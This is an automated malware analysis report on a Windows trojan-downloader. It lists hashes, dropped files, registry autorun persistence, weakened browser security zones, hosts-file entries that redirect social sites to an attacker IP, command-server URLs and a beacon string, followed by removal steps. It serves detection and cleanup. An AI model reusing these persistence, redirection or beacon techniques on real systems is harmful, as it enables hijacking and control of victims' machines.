Trojan.GenericKD.2149899_a393f9f372
Trojan-Downloader.Win32.Goo.rma (Kaspersky), Trojan.GenericKD.2149899 (AdAware)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: a393f9f372840a9184d01323243bf08b
SHA1: 8e4207af632e08ab48aa7e51abf37f90e1289a85
SHA256: cbe3749a9582b6d25bcbcab2ac4d04589ed025d85e561f9e55d6fb5e543be9ae
SSDeep: 6144:yZXBsWqsE/Ao mv8Qv0LVmwq4FU0nN876safAdFX7CFGcBEmzwPyECBsumXus3Fy:0XmwRo mv8QD4 0N46lfA37rg0PgnjsM
Size: 339458 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: Plus HDV06.02
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1252
crypts.exe:492
WScript.exe:292
WScript.exe:1020
The Trojan injects its code into the following process(es):
crypts.exe:388
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (288 bytes)
%Program Files%\House\Dorm\bi2puk.vbs (817 bytes)
%Program Files%\House\Dorm\4.txt (27 bytes)
%Program Files%\House\Dorm\3.txt (15 bytes)
%Program Files%\House\Dorm\Uninstall.exe (3931 bytes)
%Program Files%\House\Dorm\crypts.exe (2201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Program Files%\House\Dorm\instagramm.bat (1 bytes)
%Program Files%\House\Dorm\slonopotam.vbs (284 bytes)
%Program Files%\House\Dorm\Uninstall.ini (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)
The process WScript.exe:292 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\8[1].htm (2 bytes)
Registry activity
The process %original file name%.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Dorm 1.4]
"InstallDate" = "20150217"
"Publisher" = "House"
"Language" = "1033"
"NoRepair" = "1"
"UninstallString" = "%Program Files%\House\Dorm\Uninstall.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Dorm 1.4]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Dorm 1.4]
"InstallLocation" = "%Program Files%\House\Dorm\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Dorm 1.4]
"VersionMinor" = "4"
"EstimatedSize" = "220"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Dorm 1.4]
"DisplayName" = "Dorm 1.4"
"DisplayIcon" = "%Program Files%\House\Dorm\Uninstall.exe"
"DisplayVersion" = "1.4"
"InstallSource" = "c:\"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\House\Dorm]
"instagramm.bat" = "instagramm"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 28 6B C6 41 30 A4 C9 D4 EC D8 6D D6 54 6A 4C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Dorm 1.4]
"VersionMajor" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\House\Dorm]
"crypts.exe" = "crypts"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Dorm" = "%Program Files%\House\Dorm\crypts.exe"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process crypts.exe:388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 38 C7 BB 26 4D 95 77 DF 6E 73 54 96 7C A3 15"
[HKCU\Software\NVIDIA Corporation\Global\nvUpdate]
"Value" = "20150126"
"Guid" = "1c971149-6441-46c1-a8f8-18e8076784f1"
The process crypts.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 7C 63 99 A1 32 72 EE E2 EB 76 6F 56 84 CC 8A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process WScript.exe:292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 BC 6E 42 44 3A 9E 6A FD 55 68 7E EE 5B 46 B3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process WScript.exe:1020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 13 52 A9 84 03 3D 2F B2 93 D1 3C 4D BC 5E B8"
Dropped PE files
MD5 | File path |
---|---|
f3217c2d340154dd5d047817e5d04e6f | c:\Program Files\House\Dorm\Uninstall.exe |
b1acbb297b4d556e6a31a7a922d775da | c:\Program Files\House\Dorm\crypts.exe |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1152 bytes in size. The following strings are added to the hosts file listed below:
23.94.146.54 | my.mail.ru |
23.94.146.54 | m.my.mail.ru |
23.94.146.54 | vk.com |
23.94.146.54 | ok.ru |
23.94.146.54 | m.vk.com |
23.94.146.54 | odnoklassniki.ru |
23.94.146.54 | vk.com |
23.94.146.54 | www.odnoklassniki.ru |
23.94.146.54 | m.odnoklassniki.ru |
23.94.146.54 | ok.ru |
23.94.146.54 | m.ok.ru |
23.94.146.54 | www.odnoklassniki.ru |
23.94.146.54 | sotialmonstercookie.ru |
217.20.152.226 | st.mycdn.me |
217.20.156.72 | mycdn.me |
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: House
Product Name:
Product Version:
Legal Copyright: House
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.4
File Description: Dorm 1.4 Installation
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 148684 | 148992 | 4.57087 | bac8bae7a5e5326cf49943b90d1c062a |
DATA | 155648 | 10388 | 10752 | 2.62963 | abafcbfbd7f8ac0226ca496a92a0cf06 |
BSS | 167936 | 4341 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 176128 | 6040 | 6144 | 3.38637 | 7a4934595db0efc364c3982c4e335d8c |
.tls | 184320 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 188416 | 24 | 512 | 0.14174 | c4fdd0c5c9efb616fcc85d66056ca490 |
.reloc | 192512 | 6276 | 6656 | 4.56552 | 867a1120317d51734587a74f6ee70016 |
.rsrc | 200704 | 17716 | 17920 | 4.23757 | 943a7d1f572a650a4abfae9c0e7bba74 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 8
8fa1d401efdc8f2d6f38889e0ff3ae17
aaddd8d4e79e9327162b35db9b96abb5
47dcbc00a52126aeb8382ce86b5f4892
2601cb0f40ed8f01e052a344ed349383
dc56c69b5607e188be4cdb864cfdc23b
c11c94ee1112ffaa9e96d7e381f9c39d
a8af34d443637a23be69d3887c4f08e6
10bbc7a5cbc14ab1e8a8c45b6a5d5710
URLs
URL | IP |
---|---|
hxxp://104.207.142.110/apologi/trotski/8/?mwa=c5d76f | ![]() |
server-26.updmaker.com | ![]() |
time.windows.com | ![]() |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /apologi/trotski/8/?mwa=c5d76f HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 104.207.142.110
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Tue, 17 Feb 2015 09:22:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.22
Set-Cookie: ci_session=Qvm9gzeo5hZjQYubWJrqyIkxr9jDXgfgQwG1F1/39/PfK1bh3huk9+fzCTbBGMuaS/c8IiN50NmFoof2rGm4ai6lmzFWWd+emiQylVDxlMCQk1HerSpGV6mYrRAwhGxvd/JHR9eiRPW1qamhy47q1/HelHS1+Co1CQ8Sjol5/OI+c4ap+FCpvCrWo7GhfOwwKoQx+5lI/QDLaD+edVeZ80723hFTBfwrslw6vHHXimCJDWpPdZptjnxO+77DgFJQNUoI6ovyObm7TS7nH/duaMohu2ZsnZDFjxi1kWsPLYgd/c7ZghyHkKnc/b/aLbV9jHFtM0isELLRUzMYiM7d+dX8gySTSqenwOSBmKfiTbrMmJraeIWgKSdo+GIvkipb3+6y4rQiYh0fhdrQj4zoM//pzNMQjIJXbmjN6ss3mtdRQ0RvgG01DEVQ6uW0NioVawakZAOGfJvtg8yGTrdZ1Q==; path=/2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Tue, 17 Feb 2015
09:22:29 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Co
nnection: keep-alive..X-Powered-By: PHP/5.4.22..Set-Cookie: ci_session
=Qvm9gzeo5hZjQYubWJrqyIkxr9jDXgfgQwG1F1/39/PfK1bh3huk9+fzCTbBGMu
aS/c8IiN50NmFoof2rGm4ai6lmzFWWd+emiQylVDxlMCQk1HerSpGV6mYrRAwhGxvd
/JHR9eiRPW1qamhy47q1/HelHS1+Co1CQ8Sjol5/OI+c4ap+FCpvCrWo7G
hfOwwKoQx+5lI/QDLaD+edVeZ80723hFTBfwrslw6vHHXimCJDWpPdZptjnxO+
77DgFJQNUoI6ovyObm7TS7nH/duaMohu2ZsnZDFjxi1kWsPLYgd/c7ZghyHkKnc/
b/aLbV9jHFtM0isELLRUzMYiM7d+dX8gySTSqenwOSBmKfiTbrMmJraeIWgKSdo+
GIvkipb3+6y4rQiYh0fhdrQj4zoM//pzNMQjIJXbmjN6ss3mtdRQ0RvgG01DEVQ6
uW0NioVawakZAOGfJvtg8yGTrdZ1Q==; path=/..2..ok..0..
The Trojan connects to the servers at the folowing location(s):
.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
zcÁ
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module: <failed with %d>
= Process: %s
= Process: <failed with %d>
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
%WinDir%
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System
crypts.exe_388:
.text
P`.data
.rdata
0@.eh_fram
0@.bss
.idata
bpass
q1c971149-6441-46c1-a8f8-18e8076784f1
libgcj-13.dll
@%s:%s:%d
-_.!~*'()
GET /stat?uptime=%d&downlink=%d&uplink=%d&id=%s&statpass=%s&version=%d&features=%d&guid=%s&comment=%s&p=%d&s=%s HTTP/1.0
badpass
%s:%s
20150126
server-%s.o12955reps.com:35,server-%s.updmaker.com:35,server-%s.gglerr.com:35,server-%s.statgglr.com:35,server-%s.toolgot.com:35,server-%s.sndcmdex.com:35,server-%s.sendrepp.com:35,server-%s.microrepo.com:35
8kernel32.dll
advapi32.dll
rpcrt4.dll
shlwapi.dll
RegCreateKeyA
RegCloseKey
RegOpenKeyA
ws2_32.dll
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
GCC: (tdm-2) 4.8.1
KERNEL32.dll
msvcrt.dll
crypts.exe_388_rwx_00400000_00010000:
.text
P`.data
.rdata
0@.eh_fram
0@.bss
.idata
bpass
q1c971149-6441-46c1-a8f8-18e8076784f1
libgcj-13.dll
@%s:%s:%d
-_.!~*'()
GET /stat?uptime=%d&downlink=%d&uplink=%d&id=%s&statpass=%s&version=%d&features=%d&guid=%s&comment=%s&p=%d&s=%s HTTP/1.0
badpass
%s:%s
20150126
server-%s.o12955reps.com:35,server-%s.updmaker.com:35,server-%s.gglerr.com:35,server-%s.statgglr.com:35,server-%s.toolgot.com:35,server-%s.sndcmdex.com:35,server-%s.sendrepp.com:35,server-%s.microrepo.com:35
8kernel32.dll
advapi32.dll
rpcrt4.dll
shlwapi.dll
RegCreateKeyA
RegCloseKey
RegOpenKeyA
ws2_32.dll
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
GCC: (tdm-2) 4.8.1
KERNEL32.dll
msvcrt.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1252
crypts.exe:492
WScript.exe:292
WScript.exe:1020 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (288 bytes)
%Program Files%\House\Dorm\bi2puk.vbs (817 bytes)
%Program Files%\House\Dorm\4.txt (27 bytes)
%Program Files%\House\Dorm\3.txt (15 bytes)
%Program Files%\House\Dorm\Uninstall.exe (3931 bytes)
%Program Files%\House\Dorm\crypts.exe (2201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Program Files%\House\Dorm\instagramm.bat (1 bytes)
%Program Files%\House\Dorm\slonopotam.vbs (284 bytes)
%Program Files%\House\Dorm\Uninstall.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\8[1].htm (2 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Dorm" = "%Program Files%\House\Dorm\crypts.exe" - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.